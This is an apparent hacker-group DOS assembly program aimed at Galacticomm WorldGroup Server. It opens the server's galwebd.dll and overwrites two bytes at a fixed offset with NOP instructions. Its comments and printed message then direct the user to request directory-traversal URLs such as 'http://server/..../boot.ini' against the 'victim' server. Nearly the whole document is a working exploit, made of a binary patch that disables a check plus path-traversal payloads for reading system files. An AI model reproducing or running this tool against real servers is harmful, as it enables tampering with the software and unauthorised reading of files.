;############ http://server/..../boot.ini          ##############
;############ For C:\programm files\gallacticomm\W ##############
;############ orldGroup Server\                    ##############
;############ http://server/../../../../../boot.ini##############
;################################################################
ideal
model small
assume cs:@code, ds:@data, ss:@stack
codeseg
start:
mov ax,@data
mov ds,ax
mov ah,3dh
mov al,1
mov dx,offset galwebd	;name of file
int 21h
mov [FileNumber],ax
mov ax,04200h	
mov bx,[FileNumber]
sub cx,cx
mov dx,25DCh	;offset
int 021h
mov ah,040h	
mov bx,[FileNumber]
mov cx,002h		
mov dx,offset bytes_00 
int 021h
mov bx,[FileNumber]
mov ah,03Eh
int 021h
mov dx, offset greets
mov ah,009h
int 021h
mov ax,04c00h
int 021h

dataseg
bytes_00 db 90h,90h
galwebd db "galwebd.dll",0
greets  db "[WhU-team] http://www.wghack-team.net",0dh,0ah
	db "You must run this code on victim wgserver directory!",0dh,0ah
	db "Then, try this url: http://server/..../boot.ini",0dh,0ah,"$"

FileNumber dw ?
STACK 200h
END Start
-----------------------------------------------------------------------------
-B- O- N- U- S-#2